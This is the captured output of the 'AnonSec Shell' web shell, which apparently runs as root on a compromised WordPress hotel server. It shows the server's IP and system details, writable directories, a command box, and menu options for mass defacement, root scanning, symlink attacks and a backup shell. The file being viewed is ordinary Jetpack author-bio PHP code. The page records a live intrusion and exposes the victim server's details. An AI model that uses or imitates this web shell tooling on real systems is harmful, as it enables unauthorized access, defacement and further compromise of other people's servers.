AnonSec Shell
Server IP : 209.38.156.173  /  Your IP : 216.73.216.122   [ Reverse IP ]
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux lakekumayuhotel 5.15.0-136-generic #147-Ubuntu SMP Sat Mar 15 15:53:30 UTC 2025 x86_64
User : root ( 0)
PHP Version : 8.1.2-1ubuntu2.22
Disable Function : NONE
Domains : 2 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/wp-content/plugins/jetpack/modules/theme-tools/content-options/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/html/wp-content/plugins/jetpack/modules/theme-tools/content-options/author-bio.php
<?php
/**
 * Theme Tools: Author Bio functions.
 *
 * @package automattic/jetpack
 */

/**
 * The function to display Author Bio in a theme.
 */
function jetpack_author_bio() {
	// If the theme doesn't support 'jetpack-content-options', don't continue.
	if ( ! current_theme_supports( 'jetpack-content-options' ) ) {
		return;
	}

	$options            = get_theme_support( 'jetpack-content-options' );
	$author_bio         = ( ! empty( $options[0]['author-bio'] ) ) ? $options[0]['author-bio'] : null;
	$author_bio_default = ( isset( $options[0]['author-bio-default'] ) && false === $options[0]['author-bio-default'] ) ? '' : 1;
	$avatar_default     = ( isset( $options[0]['avatar-default'] ) && false === $options[0]['avatar-default'] ) ? '' : 1;

	// If the theme doesn't support 'jetpack-content-options[ 'author-bio' ]', don't continue.
	if ( true !== $author_bio ) {
		return;
	}

	// If 'jetpack_content_author_bio' is false, don't continue.
	if ( ! get_option( 'jetpack_content_author_bio', $author_bio_default ) ) {
		return;
	}

	// If we aren't on a single post, don't continue.
	if ( ! is_single() ) {
		return;
	}

	// Define class for entry-author.
	if ( ! $avatar_default && ! jetpack_has_gravatar( get_the_author_meta( 'user_email' ) ) ) {
		$class = 'author-avatar-hide';
	} else {
		$class = 'author-avatar-show';
	}
	?>
	<div class="entry-author <?php echo esc_attr( $class ); ?>">
		<?php if ( 'author-avatar-show' === $class ) : ?>
		<div class="author-avatar">
			<?php
			/**
			 * Filter the author bio avatar size.
			 *
			 * @param int $size The avatar height and width size in pixels.
			 *
			 * @module theme-tools
			 *
			 * @since 4.5.0
			 */
			$author_bio_avatar_size = apply_filters( 'jetpack_author_bio_avatar_size', 48 );

			echo get_avatar( get_the_author_meta( 'user_email' ), $author_bio_avatar_size );
			?>
		</div><!-- .author-avatar -->
		<?php endif; ?>

		<div class="author-heading">
			<h2 class="author-title">
				<?php
					/* translators: %s: post author */
					printf( esc_html__( 'Published by %s', 'jetpack' ), '<span class="author-name">' . get_the_author() . '</span>' );
				?>
			</h2>
		</div><!-- .author-heading -->

		<p class="author-bio">
			<?php the_author_meta( 'description' ); ?>
			<a class="author-link" href="<?php echo esc_url( get_author_posts_url( get_the_author_meta( 'ID' ) ) ); ?>" rel="author">
				<?php
					/* translators: %s: post author */
					printf( esc_html__( 'View all posts by %s', 'jetpack' ), get_the_author() );
				?>
			</a>
		</p><!-- .author-bio -->
	</div><!-- .entry-auhtor -->
	<?php
}

/**
 * Checks to see if the specified email address has a Gravatar image.
 *
 * @param string $email The email of the address of the user to check.
 * @return bool Whether or not the user has a gravatar
 */
function jetpack_has_gravatar( $email ) {

	$url     = get_avatar_url( $email, array( 'default' => '404' ) );
	$headers = get_headers( $url );

	// If 200 is found, the user has a Gravatar; otherwise, they don't.
	return preg_match( '|200|', $headers[0] ) ? true : false;
}

Anon7 - 2022
AnonSec Team